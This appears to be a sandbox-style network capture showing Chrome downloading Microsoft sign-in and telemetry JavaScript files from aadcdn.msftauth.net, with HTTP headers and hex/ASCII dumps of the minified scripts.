                                                                                                                                          2024-11-18 05:47:46 UTC8294INData Raw: 22 2c 55 73 65 72 56 6f 69 63 65 41 75 74 68 46 61 69 6c 65 64 43 61 6c 6c 57 65 6e 74 54 6f 56 6f 69 63 65 6d 61 69 6c 3a 22 55 73 65 72 56 6f 69 63 65 41 75 74 68 46 61 69 6c 65 64 43 61 6c 6c 57 65 6e 74 54 6f 56 6f 69 63 65 6d 61 69 6c 22 2c 55 73 65 72 56 6f 69 63 65 41 75 74 68 46 61 69 6c 65 64 49 6e 76 61 6c 69 64 50 68 6f 6e 65 49 6e 70 75 74 3a 22 55 73 65 72 56 6f 69 63 65 41 75 74 68 46 61 69 6c 65 64 49 6e 76 61 6c 69 64 50 68 6f 6e 65 49 6e 70 75 74 22 2c 55 73 65 72 56 6f 69 63 65 41 75 74 68 46 61 69 6c 65 64 50 68 6f 6e 65 48 75 6e 67 55 70 3a 22 55 73 65 72 56 6f 69 63 65 41 75 74 68 46 61 69 6c 65 64 50 68 6f 6e 65 48 75 6e 67 55 70 22 2c 55 73 65 72 56 6f 69 63 65 41 75 74 68 46 61 69 6c 65 64 49 6e 76 61 6c 69 64 50 68 6f 6e 65 4e 75
                                                                                                                                          Data Ascii: ",UserVoiceAuthFailedCallWentToVoicemail:"UserVoiceAuthFailedCallWentToVoicemail",UserVoiceAuthFailedInvalidPhoneInput:"UserVoiceAuthFailedInvalidPhoneInput",UserVoiceAuthFailedPhoneHungUp:"UserVoiceAuthFailedPhoneHungUp",UserVoiceAuthFailedInvalidPhoneNu


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          38192.168.2.1655164152.199.21.1754436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:46 UTC412OUTGET /shared/1.0/content/js/ConvergedLogin_PCore_IzDt-l0Cuie0gYRUoEk15w2.js HTTP/1.1
                                                                                                                                          Host: aadcdn.msftauth.net
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:47:47 UTC750INHTTP/1.1 200 OK
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                          Age: 3490734
                                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                                          Content-MD5: FH5pMpu6b85N3p947XewnA==
                                                                                                                                          Content-Type: application/x-javascript
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:46 GMT
                                                                                                                                          Etag: 0x8DCE4DDC9563CC2
                                                                                                                                          Last-Modified: Sat, 05 Oct 2024 01:33:59 GMT
                                                                                                                                          Server: ECAcc (lhc/7966)
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          X-Cache: HIT
                                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                                          x-ms-request-id: c1c9facd-f01e-0047-7abd-19ea3c000000
                                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                                          Content-Length: 449972
                                                                                                                                          Connection: close
                                                                                                                                          2024-11-18 05:47:47 UTC16383INData Raw: 2f 2a 21 0a 20 2a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 53 54 41 52 54 20 4f 46 20 54 48 49 52 44 20 50 41 52 54 59 20 4e 4f 54 49 43 45 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 20 2a 20 0a 20 2a 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 62 61 73 65 64 20 6f 6e 20 6f 72 20 69 6e 63 6f 72 70 6f 72 61 74 65 73 20 6d 61 74 65 72 69 61 6c 20 66 72 6f 6d 20 74 68 65 20 70 72 6f 6a 65 63 74 73 20 6c 69 73 74 65 64 20 62 65 6c 6f 77 20 28 54 68 69 72 64 20 50 61 72 74 79 20 49 50 29 2e 20 54 68 65 20 6f 72 69 67 69 6e 61 6c 20 63 6f 70 79 72 69 67 68 74 20 6e 6f 74 69 63 65 20 61
                                                                                                                                          Data Ascii: /*! * ------------------------------------------- START OF THIRD PARTY NOTICE ----------------------------------------- * * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice a
                                                                                                                                          2024-11-18 05:47:47 UTC16383INData Raw: 44 49 4e 47 5f 4e 4f 54 5f 41 4c 4c 4f 57 45 44 3a 22 38 30 30 34 37 38 44 37 22 2c 50 50 5f 45 5f 49 44 50 5f 42 49 4e 44 49 4e 47 5f 45 58 49 53 54 53 5f 53 41 4d 53 55 4e 47 3a 22 38 30 30 34 34 35 33 45 22 2c 50 50 5f 45 5f 54 52 41 4e 53 46 45 52 5f 54 4f 4b 45 4e 5f 49 4e 56 41 4c 49 44 5f 53 45 53 53 49 4f 4e 3a 22 38 30 30 34 33 35 41 30 22 7d 2c 6e 2e 45 73 74 73 45 72 72 6f 72 3d 7b 55 73 65 72 41 63 63 6f 75 6e 74 53 65 6c 65 63 74 69 6f 6e 49 6e 76 61 6c 69 64 3a 22 31 36 30 30 31 22 2c 55 73 65 72 55 6e 61 75 74 68 6f 72 69 7a 65 64 3a 22 35 30 30 32 30 22 2c 55 73 65 72 55 6e 61 75 74 68 6f 72 69 7a 65 64 41 70 69 56 65 72 73 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3a 22 35 30 30 32 30 31 22 2c 55 73 65 72 55 6e 61 75 74 68 6f 72 69 7a
                                                                                                                                          Data Ascii: DING_NOT_ALLOWED:"800478D7",PP_E_IDP_BINDING_EXISTS_SAMSUNG:"8004453E",PP_E_TRANSFER_TOKEN_INVALID_SESSION:"800435A0"},n.EstsError={UserAccountSelectionInvalid:"16001",UserUnauthorized:"50020",UserUnauthorizedApiVersionNotSupported:"500201",UserUnauthoriz
                                                                                                                                          2024-11-18 05:47:47 UTC16383INData Raw: 64 6f 63 75 6d 65 6e 74 2e 64 65 66 61 75 6c 74 56 69 65 77 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 65 2c 6e 75 6c 6c 29 3a 65 2e 63 75 72 72 65 6e 74 53 74 79 6c 65 3f 65 2e 63 75 72 72 65 6e 74 53 74 79 6c 65 3a 7b 7d 7d 2c 68 69 73 74 6f 72 79 3a 7b 70 75 73 68 53 74 61 74 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 54 2e 69 73 48 69 73 74 6f 72 79 53 75 70 70 6f 72 74 65 64 28 29 26 26 75 2e 68 69 73 74 6f 72 79 2e 70 75 73 68 53 74 61 74 65 28 65 2c 6e 29 7d 2c 72 65 70 6c 61 63 65 53 74 61 74 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 54 2e 69 73 48 69 73 74 6f 72 79 53 75 70 70 6f 72 74 65 64 28 29 26 26 75 2e 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 28 65 2c 6e 29 7d 7d 2c 61 64 64 45 76 65 6e 74 4c 69 73
                                                                                                                                          Data Ascii: document.defaultView.getComputedStyle(e,null):e.currentStyle?e.currentStyle:{}},history:{pushState:function(e,n){T.isHistorySupported()&&u.history.pushState(e,n)},replaceState:function(e,n){T.isHistorySupported()&&u.history.replaceState(e,n)}},addEventLis
                                                                                                                                          2024-11-18 05:47:47 UTC16383INData Raw: 74 50 72 6f 70 65 72 74 79 4c 6f 67 4f 70 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 72 65 74 75 72 6e 28 6e 3d 6e 7c 7c 7b 7d 29 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 22 74 72 61 63 69 6e 67 50 72 6f 70 65 72 74 79 43 68 61 6e 67 65 22 29 7c 7c 28 6e 2e 74 72 61 63 69 6e 67 50 72 6f 70 65 72 74 79 43 68 61 6e 67 65 3d 21 30 29 2c 6e 2e 65 76 65 6e 74 4c 65 76 65 6c 3d 6e 2e 65 76 65 6e 74 4c 65 76 65 6c 7c 7c 69 2e 45 76 65 6e 74 4c 65 76 65 6c 2e 49 6e 66 6f 2c 7b 76 69 65 77 4d 6f 64 65 6c 3a 65 2c 74 72 61 63 69 6e 67 4f 70 74 69 6f 6e 73 3a 6e 7d 7d 2c 73 2e 67 65 74 44 65 66 61 75 6c 74 54 65 78 74 42 6f 78 50 72 6f 70 65 72 74 79 4c 6f 67 4f 70 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 72 65 74 75 72 6e 28 6e
                                                                                                                                          Data Ascii: tPropertyLogOption=function(e,n){return(n=n||{}).hasOwnProperty("tracingPropertyChange")||(n.tracingPropertyChange=!0),n.eventLevel=n.eventLevel||i.EventLevel.Info,{viewModel:e,tracingOptions:n}},s.getDefaultTextBoxPropertyLogOption=function(e,n){return(n
                                                                                                                                          2024-11-18 05:47:47 UTC16383INData Raw: 76 61 72 20 6e 3d 65 2e 75 73 65 72 6e 61 6d 65 7c 7c 22 22 2c 74 3d 65 2e 66 6c 6f 77 54 6f 6b 65 6e 7c 7c 22 22 2c 69 3d 65 2e 70 75 72 70 6f 73 65 7c 7c 63 2e 50 61 73 73 77 6f 72 64 2c 61 3d 65 2e 70 72 6f 6f 66 54 79 70 65 2c 6f 3d 65 2e 70 72 6f 6f 66 44 61 74 61 7c 7c 22 22 2c 72 3d 65 2e 69 73 45 6e 63 72 79 70 74 65 64 2c 73 3d 65 2e 75 69 4d 6f 64 65 2c 64 3d 65 2e 6c 63 69 64 2c 6c 3d 65 2e 70 68 6f 6e 65 43 6f 75 6e 74 72 79 7c 7c 22 22 2c 70 3d 65 2e 70 68 6f 6e 65 43 6f 75 6e 74 72 79 43 6f 64 65 7c 7c 22 22 2c 6d 3d 65 2e 75 6e 61 75 74 68 53 65 73 73 69 6f 6e 49 64 2c 62 3d 65 2e 70 72 6f 6f 66 43 6f 6e 66 69 72 6d 61 74 69 6f 6e 2c 76 3d 65 2e 63 61 6e 61 72 79 46 6c 6f 77 54 6f 6b 65 6e 3b 74 68 69 73 5b 75 2e 55 73 65 72 6e 61 6d 65 5d
                                                                                                                                          Data Ascii: var n=e.username||"",t=e.flowToken||"",i=e.purpose||c.Password,a=e.proofType,o=e.proofData||"",r=e.isEncrypted,s=e.uiMode,d=e.lcid,l=e.phoneCountry||"",p=e.phoneCountryCode||"",m=e.unauthSessionId,b=e.proofConfirmation,v=e.canaryFlowToken;this[u.Username]
                                                                                                                                          2024-11-18 05:47:47 UTC16383INData Raw: 65 3f 67 2e 63 6c 6f 6e 65 28 67 65 29 3a 6e 75 6c 6c 3b 72 65 74 75 72 6e 20 69 26 26 28 69 2e 75 6e 73 61 66 65 5f 75 73 65 72 6e 61 6d 65 3d 6e 29 2c 6c 6e 28 65 2c 69 2c 21 30 2c 6c 2e 45 76 65 6e 74 49 64 73 2e 52 65 64 69 72 65 63 74 5f 4f 74 68 65 72 49 64 70 52 65 64 69 72 65 63 74 69 6f 6e 29 7d 66 75 6e 63 74 69 6f 6e 20 74 6e 28 65 2c 6e 2c 74 29 7b 74 3d 74 7c 7c 6c 65 2c 74 3d 70 2e 72 65 6d 6f 76 65 28 74 2c 22 75 73 65 72 6e 61 6d 65 22 29 2c 74 3d 70 2e 72 65 6d 6f 76 65 28 74 2c 22 6c 6f 67 69 6e 5f 68 69 6e 74 22 29 3b 76 61 72 20 69 3d 70 65 3f 67 2e 63 6c 6f 6e 65 28 70 65 29 3a 6e 75 6c 6c 3b 72 65 74 75 72 6e 20 6e 26 26 28 6e 2e 49 66 45 78 69 73 74 73 52 65 73 75 6c 74 3d 3d 3d 53 2e 4e 6f 74 45 78 69 73 74 7c 7c 6e 2e 49 73 55 6e
                                                                                                                                          Data Ascii: e?g.clone(ge):null;return i&&(i.unsafe_username=n),ln(e,i,!0,l.EventIds.Redirect_OtherIdpRedirection)}function tn(e,n,t){t=t||le,t=p.remove(t,"username"),t=p.remove(t,"login_hint");var i=pe?g.clone(pe):null;return n&&(n.IfExistsResult===S.NotExist||n.IsUn
                                                                                                                                          2024-11-18 05:47:47 UTC16383INData Raw: 3d 65 2e 73 68 6f 77 46 6f 72 67 6f 74 55 73 65 72 6e 61 6d 65 2c 68 3d 65 2e 68 69 64 65 43 72 65 64 53 77 69 74 63 68 4c 69 6e 6b 2c 5f 3d 65 2e 61 72 69 61 44 65 73 63 72 69 62 65 64 42 79 2c 43 3d 65 2e 73 65 74 46 6f 63 75 73 2c 53 3d 74 2e 73 74 72 2c 78 3d 74 2e 75 72 6c 46 6f 72 67 6f 74 55 73 65 72 6e 61 6d 65 2c 77 3d 74 2e 73 53 69 74 65 49 64 2c 79 3d 74 2e 73 43 6c 69 65 6e 74 49 64 2c 6b 3d 74 2e 73 46 6f 72 77 61 72 64 65 64 43 6c 69 65 6e 74 49 64 2c 50 3d 74 2e 73 4e 6f 50 61 42 75 62 62 6c 65 56 65 72 73 69 6f 6e 2c 54 3d 74 2e 66 53 68 6f 77 53 69 67 6e 49 6e 4f 70 74 69 6f 6e 73 41 73 42 75 74 74 6f 6e 2c 44 3d 74 2e 66 4f 66 66 6c 69 6e 65 41 63 63 6f 75 6e 74 56 69 73 69 62 6c 65 2c 45 3d 74 2e 66 55 73 65 43 65 72 74 69 66 69 63 61
                                                                                                                                          Data Ascii: =e.showForgotUsername,h=e.hideCredSwitchLink,_=e.ariaDescribedBy,C=e.setFocus,S=t.str,x=t.urlForgotUsername,w=t.sSiteId,y=t.sClientId,k=t.sForwardedClientId,P=t.sNoPaBubbleVersion,T=t.fShowSignInOptionsAsButton,D=t.fOfflineAccountVisible,E=t.fUseCertifica
                                                                                                                                          2024-11-18 05:47:47 UTC16383INData Raw: 6c 69 64 61 74 69 6f 6e 20 66 61 69 6c 65 64 2c 20 75 73 65 72 20 63 6f 6e 66 69 72 6d 61 74 69 6f 6e 20 72 65 71 75 69 72 65 64 2e 22 2c 74 68 69 73 2e 73 74 61 63 6b 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 2c 74 68 69 73 2e 69 6e 6e 65 72 45 72 72 6f 72 3d 65 2c 74 68 69 73 2e 63 6f 6e 66 69 72 6d 61 74 69 6f 6e 56 69 65 77 49 64 3d 6e 2c 74 68 69 73 2e 70 6f 73 74 43 6f 6e 66 69 72 6d 61 74 69 6f 6e 41 63 74 69 6f 6e 3d 74 7d 2c 65 2e 65 78 70 6f 72 74 73 3d 6c 7d 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 76 61 72 20 69 3d 74 28 33 29 2c 61 3d 74 28 37 29 2c 6f 3d 69 2e 41 72 72 61 79 2c 72 3d 7b 6d 65 72 67 65 53 65 73 73 69 6f 6e 73 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 76 61 72 20 69 3d 5b 5d 3b 72 65 74 75 72 6e
                                                                                                                                          Data Ascii: lidation failed, user confirmation required.",this.stack=(new Error).stack,this.innerError=e,this.confirmationViewId=n,this.postConfirmationAction=t},e.exports=l},function(e,n,t){var i=t(3),a=t(7),o=i.Array,r={mergeSessions:function(e,n,t){var i=[];return
                                                                                                                                          2024-11-18 05:47:47 UTC16383INData Raw: 75 72 6c 43 64 6e 2c 69 2e 53 65 72 76 65 72 44 61 74 61 2e 75 72 6c 49 6d 61 67 65 50 61 74 68 3d 69 2e 53 65 72 76 65 72 44 61 74 61 2e 75 72 6c 43 64 6e 2b 22 69 6d 61 67 65 73 2f 22 3b 76 61 72 20 61 3d 74 28 32 29 2c 6f 3d 74 28 37 30 29 2c 72 3d 74 28 30 29 2c 73 3d 74 28 31 29 2c 63 3d 74 28 37 33 29 2c 64 3d 74 28 37 29 2c 6c 3d 74 28 37 34 29 3b 74 28 31 38 29 2e 67 65 74 49 6e 73 74 61 6e 63 65 28 77 69 6e 64 6f 77 2e 53 65 72 76 65 72 44 61 74 61 29 3b 76 61 72 20 75 3d 72 2e 4c 6f 67 69 6e 4d 6f 64 65 2c 70 3d 73 2e 48 65 6c 70 65 72 2c 66 3d 73 2e 51 75 65 72 79 53 74 72 69 6e 67 2c 67 3d 73 2e 43 6f 6f 6b 69 65 73 2c 6d 3d 64 2e 4c 6f 67 69 6e 4f 70 74 69 6f 6e 2c 62 3d 21 31 3b 66 75 6e 63 74 69 6f 6e 20 76 28 65 29 7b 21 66 75 6e 63 74 69
                                                                                                                                          Data Ascii: urlCdn,i.ServerData.urlImagePath=i.ServerData.urlCdn+"images/";var a=t(2),o=t(70),r=t(0),s=t(1),c=t(73),d=t(7),l=t(74);t(18).getInstance(window.ServerData);var u=r.LoginMode,p=s.Helper,f=s.QueryString,g=s.Cookies,m=d.LoginOption,b=!1;function v(e){!functi
                                                                                                                                          2024-11-18 05:47:47 UTC16383INData Raw: 29 2e 6f 62 73 65 72 76 65 28 6e 2c 7b 61 74 74 72 69 62 75 74 65 73 3a 21 30 7d 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 74 6f 67 67 6c 65 28 22 66 6f 6f 22 29 7d 7d 28 6e 29 3a 63 26 26 22 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 22 69 6e 20 63 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3f 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 63 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 6e 2e 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 3d 6e 75 6c 6c 2c 63 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28
                                                                                                                                          Data Ascii: ).observe(n,{attributes:!0}),function(){n.classList.toggle("foo")}}(n):c&&"onreadystatechange"in c.createElement("script")?function(e){var n=c.createElement("script");n.onreadystatechange=function(){n.onreadystatechange=null,c.documentElement.removeChild(


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          39192.168.2.1655165152.199.21.1754436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:46 UTC579OUTGET /shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js HTTP/1.1
                                                                                                                                          Host: aadcdn.msftauth.net
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                          Referer: https://login.microsoftonline.com/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:47:47 UTC751INHTTP/1.1 200 OK
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                          Age: 20649884
                                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                                          Content-MD5: wegr9xrdYirQ87+FcvY0/A==
                                                                                                                                          Content-Type: application/x-javascript
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:46 GMT
                                                                                                                                          Etag: 0x8DB5D44A2CEB430
                                                                                                                                          Last-Modified: Thu, 25 May 2023 17:22:37 GMT
                                                                                                                                          Server: ECAcc (lhc/7931)
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          X-Cache: HIT
                                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                                          x-ms-request-id: e556728b-d01e-00f6-6fae-7d057f000000
                                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                                          Content-Length: 190152
                                                                                                                                          Connection: close
                                                                                                                                          2024-11-18 05:47:47 UTC16383INData Raw: 28 77 69 6e 64 6f 77 2e 74 65 6c 65 6d 65 74 72 79 5f 77 65 62 70 61 63 6b 4a 73 6f 6e 70 3d 77 69 6e 64 6f 77 2e 74 65 6c 65 6d 65 74 72 79 5f 77 65 62 70 61 63 6b 4a 73 6f 6e 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 32 5d 2c 5b 2c 2c 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 22 56 61 6c 75 65 4b 69 6e 64 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 2e 65 7d 29 29 2c 6e 2e 64 28 74 2c 22 45 76 65 6e 74 4c 61 74 65 6e 63 79 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 2e 61 7d 29 29 2c 6e 2e 64 28 74 2c 22 45 76 65 6e 74 50 65 72 73 69 73 74 65 6e 63 65 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 2e 62 7d
                                                                                                                                          Data Ascii: (window.telemetry_webpackJsonp=window.telemetry_webpackJsonp||[]).push([[2],[,,,function(e,t,n){"use strict";n.r(t),n.d(t,"ValueKind",(function(){return r.e})),n.d(t,"EventLatency",(function(){return r.a})),n.d(t,"EventPersistence",(function(){return r.b}
                                                                                                                                          2024-11-18 05:47:47 UTC1INData Raw: 74
                                                                                                                                          Data Ascii: t
                                                                                                                                          2024-11-18 05:47:47 UTC16383INData Raw: 2c 22 50 72 6f 70 65 72 74 69 65 73 50 6c 75 67 69 6e 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 67 2e 61 7d 29 29 2c 6e 2e 64 28 74 2c 22 50 6f 73 74 43 68 61 6e 6e 65 6c 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 76 2e 61 7d 29 29 2c 6e 2e 64 28 74 2c 22 43 6f 72 65 55 74 69 6c 73 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 2e 61 7d 29 29 2c 6e 2e 64 28 74 2c 22 42 45 5f 50 52 4f 46 49 4c 45 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 70 2e 61 7d 29 29 2c 6e 2e 64 28 74 2c 22 4e 52 54 5f 50 52 4f 46 49 4c 45 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 70 2e 62 7d 29 29 2c 6e 2e 64 28 74 2c 22 52 54 5f 50 52 4f 46 49 4c 45 22 2c 28 66 75 6e 63 74 69 6f 6e
                                                                                                                                          Data Ascii: ,"PropertiesPlugin",(function(){return g.a})),n.d(t,"PostChannel",(function(){return v.a})),n.d(t,"CoreUtils",(function(){return c.a})),n.d(t,"BE_PROFILE",(function(){return p.a})),n.d(t,"NRT_PROFILE",(function(){return p.b})),n.d(t,"RT_PROFILE",(function
                                                                                                                                          2024-11-18 05:47:47 UTC16383INData Raw: 69 73 2e 74 79 70 65 4e 61 6d 65 29 29 7c 7c 22 6e 6f 74 5f 73 70 65 63 69 66 69 65 64 22 3b 76 61 72 20 61 3d 74 2e 73 74 61 63 6b 44 65 74 61 69 6c 73 7c 7c 6c 65 28 74 29 3b 74 68 69 73 2e 70 61 72 73 65 64 53 74 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3d 65 2e 6f 62 6a 3b 69 66 28 6e 26 26 6e 2e 6c 65 6e 67 74 68 3e 30 29 7b 74 3d 5b 5d 3b 76 61 72 20 72 3d 30 2c 69 3d 30 3b 4f 62 6a 65 63 74 28 53 2e 62 29 28 6e 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 74 6f 53 74 72 69 6e 67 28 29 3b 69 66 28 67 65 2e 72 65 67 65 78 2e 74 65 73 74 28 6e 29 29 7b 76 61 72 20 61 3d 6e 65 77 20 67 65 28 6e 2c 72 2b 2b 29 3b 69 2b 3d 61 2e 73 69 7a 65 49 6e 42 79 74 65 73 2c 74 2e 70 75 73 68 28 61 29 7d 7d 29 29 3b
                                                                                                                                          Data Ascii: is.typeName))||"not_specified";var a=t.stackDetails||le(t);this.parsedStack=function(e){var t,n=e.obj;if(n&&n.length>0){t=[];var r=0,i=0;Object(S.b)(n,(function(e){var n=e.toString();if(ge.regex.test(n)){var a=new ge(n,r++);i+=a.sizeInBytes,t.push(a)}}));
                                                                                                                                          2024-11-18 05:47:47 UTC2INData Raw: 63 79
                                                                                                                                          Data Ascii: cy
                                                                                                                                          2024-11-18 05:47:47 UTC16383INData Raw: 20 70 72 65 76 65 6e 74 73 20 75 73 20 66 72 6f 6d 20 67 65 74 74 69 6e 67 20 74 68 65 20 64 65 74 61 69 6c 73 20 6f 66 20 74 68 69 73 20 65 78 63 65 70 74 69 6f 6e 2e 20 43 6f 6e 73 69 64 65 72 20 75 73 69 6e 67 20 74 68 65 20 27 63 72 6f 73 73 6f 72 69 67 69 6e 27 20 61 74 74 72 69 62 75 74 65 2e 22 2c 61 2c 74 2e 6c 69 6e 65 4e 75 6d 62 65 72 7c 7c 30 2c 74 2e 63 6f 6c 75 6d 6e 4e 75 6d 62 65 72 7c 7c 30 2c 6e 2c 72 2c 6e 75 6c 6c 2c 6f 29 2c 63 29 3a 28 74 2e 65 72 72 6f 72 53 72 63 7c 7c 28 74 2e 65 72 72 6f 72 53 72 63 3d 6f 29 2c 65 2e 74 72 61 63 6b 45 78 63 65 70 74 69 6f 6e 28 7b 65 78 63 65 70 74 69 6f 6e 3a 74 2c 73 65 76 65 72 69 74 79 4c 65 76 65 6c 3a 33 7d 2c 63 29 29 7d 63 61 74 63 68 28 65 29 7b 76 61 72 20 75 3d 6e 3f 6e 2e 6e 61 6d 65
                                                                                                                                          Data Ascii: prevents us from getting the details of this exception. Consider using the 'crossorigin' attribute.",a,t.lineNumber||0,t.columnNumber||0,n,r,null,o),c):(t.errorSrc||(t.errorSrc=o),e.trackException({exception:t,severityLevel:3},c))}catch(e){var u=n?n.name
                                                                                                                                          2024-11-18 05:47:47 UTC1INData Raw: 4f
                                                                                                                                          Data Ascii: O
                                                                                                                                          2024-11-18 05:47:47 UTC16383INData Raw: 62 6a 65 63 74 28 63 2e 74 29 28 65 29 3f 65 3a 7b 7d 3b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 4f 62 6a 65 63 74 28 63 2e 74 29 28 74 29 3f 74 3a 7b 7d 3b 74 68 69 73 2e 5f 73 65 74 42 61 73 69 63 50 72 6f 70 65 72 74 69 65 73 28 6e 2c 65 29 2c 74 68 69 73 2e 5f 73 65 74 50 61 67 65 54 61 67 73 28 6e 2c 65 29 2c 6e 2e 69 73 4d 61 6e 75 61 6c 3d 21 65 2e 69 73 41 75 74 6f 2c 72 2e 62 65 68 61 76 69 6f 72 3d 74 68 69 73 2e 5f 67 65 74 42 65 68 61 76 69 6f 72 28 65 29 2c 72 2e 76 70 48 65 69 67 68 74 3d 65 2e 76 70 48 65 69 67 68 74 2c 72 2e 76 70 57 69 64 74 68 3d 65 2e 76 70 57 69 64 74 68 2c 72 2e 66 72 61 6d 65 77 6f 72 6b 3d 65 2e 66 72 61 6d 65 77 6f 72 6b 2c 72 2e 73 79 73 74 65 6d 54 69 6d 69 6e 67 3d 65 2e 73 79 73 74 65 6d 54 69 6d 69 6e 67 2c 72 2e 63
                                                                                                                                          Data Ascii: bject(c.t)(e)?e:{};var n={},r=Object(c.t)(t)?t:{};this._setBasicProperties(n,e),this._setPageTags(n,e),n.isManual=!e.isAuto,r.behavior=this._getBehavior(e),r.vpHeight=e.vpHeight,r.vpWidth=e.vpWidth,r.framework=e.framework,r.systemTiming=e.systemTiming,r.c
